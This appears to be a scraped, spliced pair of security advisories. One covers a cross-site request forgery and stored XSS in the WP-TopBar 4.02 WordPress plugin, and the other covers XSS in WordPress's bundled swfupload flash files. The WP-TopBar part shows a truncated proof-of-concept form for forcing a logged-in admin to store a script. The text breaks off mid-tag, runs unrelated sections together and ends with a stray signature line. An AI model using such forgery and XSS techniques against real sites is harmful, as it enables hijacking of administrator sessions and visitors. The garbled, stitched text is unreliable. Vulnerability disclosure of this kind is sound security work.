The wp-topbar.php does not utilize a nonce value when submitting any POST
changes.  As a result, this page is vulnerable to Cross Site Request
Proof of Concept Code:
<form name="testform" action="
<input type="hidden" name="wptbbartext"
<input type="hidden" name="wptblinktext" value="whatever">
<input type="hidden" name="wptblinkurl"
<input type="hidden" name="wptblinktarget" value="blank">
<input type="hidden" name="wptbenableimage" value="false">
<input type="hidden" name="wptbbarimage" value="">
<input type="hidden" name="update_wptbSettings"
<script type="text/javascript">
This script takes advantage of a logged in user to submit the required
variables needed to update an existing TopBar with the required settings
that commits and executes a Stored XSS vulnerability from a previous
disclosure.  In this example it was tested against a wordpress application
running on �localhost� and altered a TopBar with the �id� of 1.  This
version of WP-TopBar creates a default TopBar with the id of 1 upon
installation.  Any subsequent TopBar created has an id incremented.  It can
be assumed that a user is more then likely to still have the default TopBar
and easily attack it.
# Vulnerability Timeline
2012-09-04 � Vulnerability Reported
2012-09-05 � Developer Acknowledges
2012-09-10 � Developer Issues Fix (v4.03)
2012-09-15 -  Vulnerability Disclosed
Blake Entrekin
Independent Security Consultant/
Web Penetration Tester
Twitter: @entresec <https://twitter.com/#%21/entresec>
# Exploit Title: WP-TopBar 4.02 Authenticated Stored XSS
# Date: 2012-09-13
# Author: Blake Entrekin
# Version: 4.02
# Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip
# Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/
Stored XSS
The message field (wptbbartext variable) of the wp-topbar.php page is
vulnerable to Stored Cross-site Scripting.  This variable is only
accessible via the admin menu of the plugin.
The following code is an example:
This code is committed to the database upon submission and will run both
under the admin interface when the bar is shown as a preview as well as the
front facing page where the bar is set to display.

Affected products:
Vulnerable are versions WordPress 2.5 - 3.3.1.
File swfupload.swf is bundled with WordPress 2.7 - 3.3.1.
File swfupload_f9.swf is bundled with WordPress 2.5 - 2.7.1.
In versions WP 2.7 - 2.7.1 both flash-files are contained.
XSS (WASC-08):
WordPress 2.7-3.3.1.
WordPress 2.5-2.7.1.
At 20.04.2012 this vulnerability was fixed in WordPress 3.3.2. The 
developers of WordPress released new version of flash file, which could be 
used by all web developers, which were using swfupload.
Swfupload is used in WordPress, plugins for WP and in other web 
applications. There are many web applications with it, not as many as those 
which are using JW Player (http://securityvulns.com/docs28176.html) and JW 
Player Pro (http://securityvulns.com/docs28483.html) (vulnerabilities in 
them I've disclosed earlier), but still a lot of. And in the next letter 
I'll present a set of such web applications.
Leader at J2TEAM. Website: https://j2team.dev/

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